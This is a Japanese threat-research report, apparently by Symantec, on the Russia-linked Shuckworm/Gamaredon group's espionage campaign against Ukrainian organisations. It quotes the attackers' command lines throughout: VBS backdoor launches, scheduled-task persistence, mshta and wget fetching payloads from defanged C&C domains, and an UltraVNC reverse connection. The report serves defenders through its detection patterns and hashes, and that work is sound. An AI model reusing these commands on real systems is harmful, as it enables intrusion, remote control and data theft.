ウクライナへのサイバースパイ攻撃を続けるShuckworm

ロシアと関係があるShuckwormグループ（別名Gamaredon、Armageddon）は、ウクライナ国内の標的に対してサイバースパイ攻撃を続けています。Broadcom Softwareの一事業部であるシマンテックの脅威調査チームは、ここ数カ月の間に、ウクライナ国内の多くの組織に対する攻撃を試みた証拠を発見しました。

Shuckwormは、少なくとも2013年から活動しており、主にウクライナの企業を対象としたサイバースパイ活動を専門としています。このグループは、遠隔操作システム（RMS）やUltraVNCなどの無償で入手できるリモートアクセスツールや、Pterodo/Pteranodonと呼ばれるカスタマイズしたマルウェアを、フィッシングメールを使用して標的に配布することで知られています。ウクライナのSecurity Service of Ukraine（SSU）が発表した最近の報告書によると、Shuckwormの攻撃は最近洗練されてきており、攻撃者は資格情報を盗むためにLOL（環境寄生型/自給自足型 ）ツールを使用し、被害者のネットワーク上を水平移動するようになっていると指摘しています。シマンテックが確認した最近の活動も、SSUが記録したものと合致しています。

Shuckwormの活動: ケーススタディ

シマンテックは、ウクライナのある組織において、2021年7月14日に始まり、2021年8月18日まで続いたShuckwormの活動を観測しました。攻撃の連鎖は、フィッシングメールで送信されたと思われる悪意のある文書が、感染したマシンのユーザーによって開かれたことから始まりました。侵害されたコンピュータ上での攻撃者の活動を、以下で詳しく説明していきます。

7月14日

午前8時48分（現地時間）に、不審なWord文書がマシン上で開かれます。その文書が開かれてからわずか5分後、疑わしいコマンドが実行され、悪意のあるVBSファイル（depended.lnk）が起動されます。このファイルは、Shuckworm（別名Pterodo）が利用する既知のカスタムバックドアです。

• wscript.exe CSIDL_PROFILE\searches\depended.lnk //e:VBScript //b

このバックドアは、CSIDL_PROFILE\searches\depended.exe （94a78d5dce553832d61b59e0dda9ef2c33c10634ba4af3acb7fb7cf43be17a5b）をhxxp://92.242.62.131/wordpress.php?is=[REDACTED]からダウンロードして実行するために使用されます。

さらに以下の2つのVBSスクリプトがdepended.exe経由で実行されることが確認されています。

• "CSIDL_SYSTEM\wscript.exe" CSIDL_PROFILE\appdata\roaming\reflect.rar //e:VBScript //b
• "CSIDL_SYSTEM\wscript.exe" CSIDL_PROFILE\appdata\local\temp\deep-thoughted. //e:VBScript //b

そして、システム再起動時の永続性を確保しドロップされたスクリプトを実行するために、スケジュールされたタスクが作成されます。これにより、VBSファイルdeep-thoughted.pptが10分ごとに実行されます。

• SCHTASKS /CREATE /sc minute /mo 10 /tn "deep-thoughted" /tr "wscript.exe " CSIDL_COMMON_PICTURES\deep-thoughted.ppt //e:VBScript //b" /F

その後、攻撃者は、depended.exeを介してmshta.exeを悪用し、リモートサーバー上にホストされているHTAファイルを実行することが確認されています。Mshtaユーティリティは、Microsoft HTML Application（HTA）ファイルを実行することができ、アプリケーション制御ソリューションを回避するために悪用される可能性があります。mshta.exeは、Internet Explorerのセキュリティコンテキストの外で実行されるため、ブラウザのセキュリティ設定も回避できます。

• "CSIDL_SYSTEM\cmd.exe" /c CSIDL_SYSTEM\mshta.exe hxxp://fiordan.ru/FILM.html /f id=[REDACTED]

同時に、depended.exeを介してPterodoの新しい亜種がインストールされます。

先ほどと同様に、2つの追加スケジュールタスクが作成されます。

• "CSIDL_SYSTEM\schtasks.exe" /CREATE /sc minute /mo 12 /tn "MediaConverter" /tr "wscript.exe " CSIDL_COMMON_MUSIC\tvplaylist.mov //e:VBScript //b " /F"
• "CSIDL_SYSTEM\schtasks.exe" /CREATE /sc minute /mo 12 /tn "VideoHostName" /tr "wscript.exe " CSIDL_COMMON_VIDEO\webmedia.m3u //e:VBScript //b " /F"

攻撃者は引き続き、バックドアの亜種をインストールし、スクリプトを介してコマンドを実行することで持続性を確保しています。

• "CSIDL_SYSTEM\wscript.exe" CSIDL_PROFILE\appdata\local\temp\22333.docx //e:VBScript //b
• "CSIDL_SYSTEM\wscript.exe" CSIDL_PROFILE\appdata\local\temp\9140.d //e:VBScript //b
• wscript.exe CSIDL_COMMON_MUSIC\tvplaylist.mov //e:VBScript //b
• schtasks /Create /SC MINUTE /MO 15 /F /tn BackgroundConfigSurveyor /tr "wscript.exe C:\Users\o.korol\AppData\Roaming\battery\battery.dat //e:VBScript //b"
• "CSIDL_SYSTEM\cmd.exe" /c CSIDL_PROFILE\appdata\roaming\battery\battery.cmd

この直後に、攻撃者はping.exeを使って新しいC&Cサーバーへの接続性をテストしているようです。

• CSIDL_SYSTEM\cmd.exe /c ping -n 1 arianat.ru

接続が有効であることが確認されると、攻撃者はPterodoバックドアの別の亜種をダウンロードし、新しいC&Cを使用して追加のスクリプトやツールをダウンロードし、数分ごとに実行されるスケジュールタスクを作成し始めます。

• "CSIDL_SYSTEM\wscript.exe" CSIDL_PROFILE\appdata\local\temp\12382. //e:VBScript //b
• "CSIDL_SYSTEM\cmd.exe" /c CSIDL_SYSTEM\mshta.exe hxxp://avirona.ru/7-ZIP.html /f id=<?,?>
• CSIDL_SYSTEM\mshta.exe hxxp://avirona.ru/7-ZIP.html /f id=<?,?>
• "CSIDL_SYSTEM\schtasks.exe" /CREATE /sc minute /mo 12 /tn "MediaConverter" /tr "wscript.exe " CSIDL_COMMON_MUSIC\mediatv.mov //e:VBScript //b " /F"
• "CSIDL_SYSTEM\schtasks.exe" /CREATE /sc minute /mo 12 /tn "VideoHostName" /tr "wscript.exe " CSIDL_COMMON_VIDEO\videotv.m3u //e:VBScript //b " /F"

この時点で、攻撃者は活動を停止します。しかし、7月14日の残りの時間、スケジュールされたタスクからコマンドが実行されているのが引き続き確認できます。

7月16日

午前5時28分、攻撃者が戻り、CSIDL_COMMON_VIDEO\planeta.exe（1ea3881d5d03214d6b7e37fb7b10221ef51782080a24cc3e275f42a3c1ea99c1）を経由してPterodoの複数の追加亜種が実行されます。  

• "CSIDL_SYSTEM\wscript.exe" CSIDL_PROFILE\appdata\local\temp\32440.docx //e:VBScript //b
• "CSIDL_SYSTEM\wscript.exe" CSIDL_PROFILE\appdata\local\temp\20507.d //e:VBScript //b

その後、攻撃者がplaneta.exeを介して以下のコマンドを実行する様子が確認されています。

• CSIDL_SYSTEM\cmd.exe /c ""CSIDL_PROFILE\appdata\local\temp\7zsfx000."" ""
• "CSIDL_SYSTEM\cmd.exe" /c ipconfig /flushdns

上記のflushdnsコマンドは、攻撃者がC&CのDNSレコードを更新したことを示している可能性があります。これは、攻撃者のツールの一部がハードコードされたドメインを使用していることが確認されたためです。この事例では、攻撃者が同じC&Cを利用した追加のバックドアをインストールしようとする直前にflushdnsコマンドが実行されていました。

7月28日

その後、Pterodoの別の亜種（deep-sided.fly）が実行され、deerskin.exe（ad1f796b3590fcee4aeecb321e45481cac5bc022500da2bdc79f768d08081a29）という新しいファイルのダウンロードと実行に使用されました。このファイルはVNCクライアントのドロッパーです。deerskin.exeが実行されると、google DNS（8.8.8.8）にpingを実行してインターネットの接続性をテストした後、VNCクライアントをドロップして、攻撃者が管理するリモートC&Cサーバーへの接続を確立します。

• "%USERPROFILE%\Contacts\DriversHood.exe" -autoreconnect -id:2097 -connect mucoris.ru:5612

これと同じアクションを実行するファイルがほかにも2つ特定されています。

• 1ddc9b873fe4f4c8cf8978b6b1bb0e4d9dc07e60ba188ac6a5ad8f162d2a1e8f
• ad1f796b3590fcee4aeecb321e45481cac5bc022500da2bdc79f768d08081a29

このVNCクライアントは、この攻撃の最終的なペイロードであると思われます。

7月29日から8月18日の間も活動は継続しており、攻撃者がカスタムVBSバックドアの複数の亜種を展開し、VBSスクリプトを実行し、上述のものと同様のスケジュールされたタスクを作成しているのを確認しました。8月18日以降、このマシンでの不審な活動は観察されませんでした。

この調査の過程で、特にVNCクライアントのインストール後に、侵害されたマシンのさまざまな場所から多くの文書が開かれました。これがユーザーの正当な行動なのか、それとも攻撃者が機密情報を収集して流出させようとした行動なのかは不明です。アクセスされた文書のタイトルは、仕事の説明から標的となる組織に関する機密情報まで多岐にわたります。

技術解説

シマンテックの調査によると、最近の攻撃でShuckwormが使用したファイルは全部で7つです。7つのファイルはすべて7-zipのSFX自己解凍バイナリで、以前Shuckwormの攻撃に使われた形式です。

descend.exe

実行すると、descend.exe（0d4b8e244f19a009cee50252f81da4a2f481da9ddb9b204ef61448d56340c137）という名前のファイルがVBSファイルをドロップし、そのVBSファイルが以下の場所に2つ目のVBSファイルをドロップします。

• %USERPROFILE%\Downloads\deerbrook.ppt
• %PUBLIC%\Pictures\deerbrook.ppt

そして、以下のようなタスクを作成します。

• SCHTASKS /CREATE /sc minute /mo 11 /tn "deerbrook" /tr "wscript.exe '<DROPPED_FOLDER>\deerbrook.ppt' //e:VBScript //b" /F

VBSファイルdeerbrook.ppt（b46e872375b3c910fb589ab75bf130f7e276c4bcd913705a140ac76d9d373c9e）は、deep-pitched.enarto.ruにあるコマンドアンドコントロール（C&C）サーバーにアクセスします。C&Cサーバーが使用可能な場合は、HTTP POST要求が送信され、ペイロードがダウンロードされます。ペイロードは、%USERPROFILE%フォルダにdeep-sunken.tmpとして保存された後、deep-sunken.exeに名前を変更して実行されます。その後、バイナリは削除されます。

deep-sunken.exe

ファイルdeep-sunken.exe（02c41bddd087522ce60f9376e499dcee6259853dcb50ddad70cb3ef8dd77c200）が実行されると、侵害されたコンピュータ上に以下のファイルをドロップします。

• %APPDATA%\baby\baby.cmd
• %APPDATA%\baby\baby.dat
• %APPDATA%\baby\basement.exe（wgetバイナリ）
• %APPDATA%\baby\vb_baby.vbs

そして、以下のようなタスクを作成します。

• schtasks /Create /SC MINUTE /MO 15 /F /tn BackgroundConfigSurveyor /tr "wscript.exe [%APPDATA%]\baby\baby.dat" //e:VBScript //b

その後、C&Cサーバー（arianat.ru）に接続し、wgetを使って別のペイロードをダウンロードします。

• basement.exe --user-agent="Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.64::[VICTIM_ID]::/.beagle/." -q -b -c -t 2 "hxxp://arianat.ru/baby.php" -P "[%APPDATA%]\baby"

baby.datファイルはVBSファイルで、baby.cmdを実行し、C&Cサーバーからペイロードをダウンロードして実行します。

vb_baby.vbsファイルは、ダウンロードしたペイロードの名前をbaby.phpからbacked.exeに変更します。

ダウンロードしたペイロード（backed.exe）は回収できませんでした。しかし、調査中に以下のファイルも入手しました。

z4z05jn4.egf.exe

z4z05jn4.egf.exeファイル（fd9a9dd9c73088d1ffdea85540ee671d8abb6b5ab37d66a760b2350951c784d0）は前回のファイル（deep-sunken.exe）に似ていますが、フォルダやファイル名、C&Cサーバー（iruto.ru）が異なります。

defiant.exe

defiant.exeファイル（a20e38bacc979a5aa18f1954df1a2c0558ba23cdc1503af0ad1021c330f1e455）が実行されると、以下の場所にVBSファイルをドロップします。

• %TEMP%\\deep-versed.nls
• %PUBLIC\Pictures\deep-versed.nls

そして、以下のようなタスクを作成します。

• SCHTASKS /CREATE /sc minute /mo 12 /tn \"deep-versed\" /tr \"wscript.exe \"[%PUBLIC%]\\Pictures\\deep-versed.nls\" //e:VBScript //b\" /F

ドロップされたdeep-versed.nlsファイル（817901df616c77dd1e5694e3d75aebb3a52464c23a06820517108c74edd07fbc）は、C&Cサーバー（deep-toned.chehalo.ru）からペイロードをダウンロードして、以下の場所にdeep-green.exeとして保存します。

• %PUBLIC%\Downloads

deep-green.exe

deep-green.exeファイル（1ddc9b873fe4f4c8cf8978b6b1bb0e4d9dc07e60ba188ac6a5ad8f162d2a1e8f）にはUltraVNCバイナリが含まれており、実行すると以下のコマンドラインを使用してリピーター（mucoris.ru:5612）に接続されます。

• -autoreconnect -id:%RANDOM% -connect mucoris.ru:5612

UltraVNCはオープンソースのリモート管理/リモートデスクトップソフトウェアのユーティリティです。

deep-green.exe

deep-green.exeという名前の2つ目のファイル（f6c56a51c1f0139036e80a517a6634d4d87d05cce17c4ca5adc1055b42bf03aa）には、Process Explorer（procexp）のバイナリが含まれています。

Process Explorerは、Microsoft Windows用のフリーウェアのタスクマネージャー兼システムモニターです。

deep-green.exe

deep-green.exeという名前の3つ目のファイル（de5a53a3b75e3e730755af09e3cacb7e6d171fc9b1853a7200e5dfb9044ab20a）は、descend.exe（0d4b8e244f19a009cee50252f81da4a2f481da9ddb9b204ef61448d56340c137）と似ています。ファイル名とC&Cサーバー（deer-lick.chehalo.ru）が異なるだけです。

deep-green.exe

deep-green.exeという名前の4つ目にして最後のファイル（d15a7e69769f4727f7b522995a17a0206ac9450cfb0dfe1fc98fd32272ee5ba7）は、以下の場所にVBSファイルをドロップします。

• %PUBLIC%\Music\

そして、以下のようなタスクを作成します。

• "/CREATE /sc minute /mo 12 /tn \"MediaConverter\" /tr \"wscript.exe \"C:\\Users\\Public\\Music\\MediaConvertor.dat\" //e:VBScript //b \" /F"

MediaConvertor.datファイルはリムーバブルドライブを検索し、以下のコマンドを使って.lnkファイルを作成します。

• mshta.exe hxxp://PLAZMA.VIBER.ontroma.ru/PLAZMA.html /f id=January

IOCパターン

シマンテックの調査で発見された数多くの侵害の痕跡（IOC）を分析した結果、Shuckwormの攻撃からネットワークを守るために役立つと思われる以下のパターンが明らかになりました。

• URL内のC&CのIPのほとんどが、SSUの報告書に記載されているホスティングプロバイダーのショートリストに含まれるプロバイダー、すなわちAS9123 TimeWeb Ltd.（ロシア）に属しています。
• 発見された疑わしいC&CのURLのほとんどは、IPベースのURLであり、独自のURI構造を使用しています。
  • http + IP + /<任意の単語>.php?<任意の単語>=<1個の整数>,<5-7個の英数字> OR
  • http + IP + /<任意の単語>.php?<任意の単語>=<1個の整数>,<5-7個の英数字>-<2個の整数>
• 悪質と疑われるファイルのほとんどは、以下のショートリストにあるディレクトリのいずれかで見つかります。
  • csidl_profile\links
  • csidl_profile\searches
  • CSIDL_PROFILE\appdata\local\temp\
  • CSIDL_PROFILE\
• 疑わしい悪意のあるファイルはほぼすべて、ファイル名が「d」で始まる単語で構成されており、いくつかはハイフン（-）で区切られた2つの単語（最初の単語も「d」で始まる）で構成されています。その例を以下に示します。
  • deceive.exe
  • deceived.exe
  • deception.exe
  • deceptive.exe
  • decide.exe
  • decided.exe
  • decipher.exe
  • decisive.exe
  • deep-sunken.exe
  • deep-vaulted.exe
• 検出されたコマンドラインはシンプルで、バイナリパスと名前だけで構成されており、スイッチなどはありません。
• 疑わしい悪意のあるファイルの多くは、親プロセスのハッシュが不明であり、いずれも利用可能な情報はありません。

SSUが発表した2021年11月の報告書によると、2014年以降、Shuckwormグループは1,500以上のウクライナ政府システムに対して5,000以上の攻撃を行っています。ウクライナの多くの組織に対するShuckwormの攻撃未遂に関するシマンテックの最近の調査結果からも明らかなように、この活動はほとんど衰える気配がありません。

保護/緩和

Symantec Protection Bulletinで保護に関する最新情報をご確認ください。

侵害の痕跡（IOC）